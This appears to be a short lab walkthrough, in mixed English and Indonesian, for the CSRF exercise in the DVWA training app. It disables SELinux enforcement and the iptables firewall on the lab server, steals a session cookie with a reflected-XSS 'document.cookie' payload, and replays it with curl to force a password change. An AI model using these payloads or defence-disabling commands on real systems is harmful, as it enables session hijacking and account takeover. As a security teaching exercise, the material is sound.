Cross Site Request Forgery

Server :

sestatus

If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.

Place selinux harusnya mode disable

ubah current mode permissive :

echo 0 > /selinux/enforce

disable firewall :

service iptables save
service iptables stop

Client :

Masuk CSRF

New password: abc123
Confirm new password: abc123
Click Change

copy url setelah ganti password

taruh di text editor / untitled (A)

logout

masuk ke XSS reflected

What's your Name? <script>alert(document.cookie)</script>
Click Submit

copy isi alert nya

paste di file tadi (B)

curl --cookie "B" --location "A"

jadinya :

curl --cookie "security=low; PHPSESSID=3juclcme0enmmhns9t36mi4ij0" --location "http://192.168.43.207/dvwa/vulnerabilities/csrf/?password_new=test123&password_conf=test123&Change=Change#"

ubah password :

curl --cookie "security=low; PHPSESSID=3juclcme0enmmhns9t36mi4ij0" --location "http://192.168.43.207/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#"

masuk terminal

<ubah password> | grep "Password Changed" | tee curl.txt

silahkan logout dan login lagi

Wetofu

Cross Site Request Forgery

Server :

Client :